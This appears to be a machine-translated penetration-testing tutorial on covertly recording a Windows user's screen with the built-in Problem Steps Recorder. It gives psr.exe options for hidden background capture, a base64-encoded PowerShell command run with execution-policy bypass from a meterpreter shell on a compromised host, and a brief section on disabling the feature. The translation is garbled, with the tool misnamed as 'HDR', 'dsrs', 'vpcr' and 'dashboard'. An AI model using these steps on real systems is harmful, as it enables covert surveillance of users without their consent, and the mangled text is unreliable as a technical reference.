Ingenious Process Analysis of Windows desktop monitoring by using the HDR

Ingenious Process Analysis of Windows desktop monitoring by using the HDR

0x00 Preface

During the penetration test, if you need to obtain more information about the host, the operations on recording the System screen are more direct and effective than those on the keyboard record.
Maybe everyone has their own unique implementation method, but if you can use the built-in program implementation in Windows, I personally think it is definitely the most preferred solution.
The following describes how to use functions provided by Windows to implement screen monitoring.

0x01 Introduction

PSR(Problem Steps Recorder ).WER(Windows Error Reporting) to collect system Error reports, but these reports often contain too little information to solve the actual problem.

To solve this problem, Microsoft has added a new one for Windows 7. This one records all operations performed by users in the event of a crash, this allows testers and developers to reproduce the environment for analysis and debugging.

During the running of this file, the operations on the screen are automatically recorded. Each operation is automatically saved as an image and a zip report is generated.

Note:
Baidu encyclopedia has an incorrect description of the name of the psr. The correct description should be Problem Steps Recorder (The Problem has been submitted)

Link:
Http://baike.baidu.com/link? Url = BCQtF6gpxNGulRPj-vACw_NGwZvHPcrfvn4vmx6u_JFI_OcuPJIFzY3GYE-mu91DZcB-RLiQ6pGXTki1Fc0Y6K

0x02 usage 1. Start psr.exe and click Start recording.

You can use the shortcut key win + R to directly enter the dsrs to start
This is the Operation Panel of the psr. Click Start record to record the current screen operation.

After clicking this button, you will be prompted about the permission. If you need to record the programs with the Administrator permission, you need to use the Administrator permission to run the SRS,

2. Perform any operation

When you start recording a video by running the vpcr command, the special effect will be added when you click it.

3. Stop record and save report

4. View reports

The report will record each operation and the mouse operation.

For example, when you click the mouse, you can see which operations are performed by the current mouse from the comment

In addition, relevant details will be recorded in the second half of the report, which is also interesting:

0x03 advanced methods

In the operations on the recording screen, the dashboard starts the UI and adds special effects to the mouse clicking operation. This obviously cannot meet the requirements of penetration testing.

However, the command line parameters provided by the HDR server are used as background records.

The command line parameters are as follows:

#!bashpsr.exe [/start |/stop][/output 
 
  ] [/sc (0|1)] [/maxsc 
  
   ][/sketch (0|1)] [/slides (0|1)] [/gui (0|1)][/arcetl (0|1)] [/arcxml (0|1)] [/arcmht (0|1)][/stopevent 
   
    ] [/maxlogsize 
    
     ] [/recordpid 
     
      ]/start Start Recording. (Outputpath flag SHOULD be specified)/stop Stop Recording./sc Capture screenshots for recorded steps./maxsc Maximum number of recent screen captures./maxlogsize Maximum log file size (in MB) before wrapping occurs./gui Display control GUI./arcetl Include raw ETW file in archive output./arcxml Include MHT file in archive output./recordpid Record all actions associated with given PID./sketch Sketch UI if no screenshot was saved./slides Create slide show HTML pages./output Store output of record session in given path./stopevent Event to signal after output files are generated.
     
    
   
  
 

In combination with the actual situation, you can use the following command:

Psr.exe/start/gui 0/output C: \ test \ capture.zip

Start and start recording in the background, and save the file as C: \ test \ capture.zip.

Psr.exe/stop

Stops recording and exits the HDR file. The report file is automatically saved.

0x04 actual test

Test environment:

Server: OS: Kali linuxIP: 192.168.174.133Client: OS: Win7 x86IP: 192.168.174.128Kali the meterpreter permission has been obtained.

Test function:

After recording is automatically started at a specified time, the system automatically exits and saves the report file.

Powershell can be used for simple implementation of the above functions:

1,Enable Automatic Recording, set it to non-interface mode, and specify the output path:

#!bashpsr.exe /start /gui 0 /output C:\test\capture.zip;

2,Wait 10 s, that is, the recording time is 10 s:

#!bashStart-Sleep -s 10;

3,Stop recording and exit automatically:

#!bashpsr.exe /stop;

You can save the above Code as C: \ test \ 1.txt, and then perform base64 encryption on it.

In the Powershell environment, execute the following code to perform base64 encryption on the Function Code:

#!powershell$string=Get-Content "C:\test\1.txt"$bytes = [System.Text.Encoding]::Unicode.GetBytes($string)$encoded = [System.Convert]::ToBase64String($bytes)$encoded

To obtain the encrypted Powershell command from the output:

#!bashcABzAHIALgBlAHgAZQAgAC8AcwB0AGEAcgB0ACAALwBnAHUAaQAgADAAIAAvAG8AdQB0AHAAdQB0ACAAQwA6AFwAdABlAHMAdABcAGMAYQBwAHQAdQByAGUALgB6AGkAcAA7ACAAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwADsAIABwAHMAcgAuAGUAeABlACAALwBzAHQAbwBwADsA

Then you can directly execute the Powershell command in the shell of meterpreter:

#!bashpowershell -ep bypass -enc cABzAHIALgBlAHgAZQAgAC8AcwB0AGEAcgB0ACAALwBnAHUAaQAgADAAIAAvAG8AdQB0AHAAdQB0ACAAQwA6AFwAdABlAHMAdABcAGMAYQBwAHQAdQByAGUALgB6AGkAcAA7ACAAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwADsAIABwAHMAcgAuAGUAeABlACAALwBzAHQAbwBwADsA

After code execution, wait for 10 seconds to generate the report file capture.zip. The test is successful.

0x05 defense

You can disable this function in either of the following ways:

1. Use group policies

Chinese system:

Gpedit. msc-management template-Windows Components-application compatibility

Enable or disable the problem Recorder

English system:

Gpedit. msc-Computer Configuration-Administrative Templates-Windows Components-Application Compatibility

Enable Turn off Problem Steps Recorder

2. Modify the Registry

#!bash[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\AppCompat]

Create "DisableUAR" = dword: 00000001

Note:
Dword = 1 enabled in corresponding Group Policy
Dword = 0 disabled in corresponding Group Policy
Delete the unconfigured Group Policy for "DisableUAR"

0x06 Summary

By monitoring a Windows desktop with the dashboard, the dashboard not only captures user desktop operations, but also contains more useful details in the report. We believe that during the penetration testing process, it will definitely be used.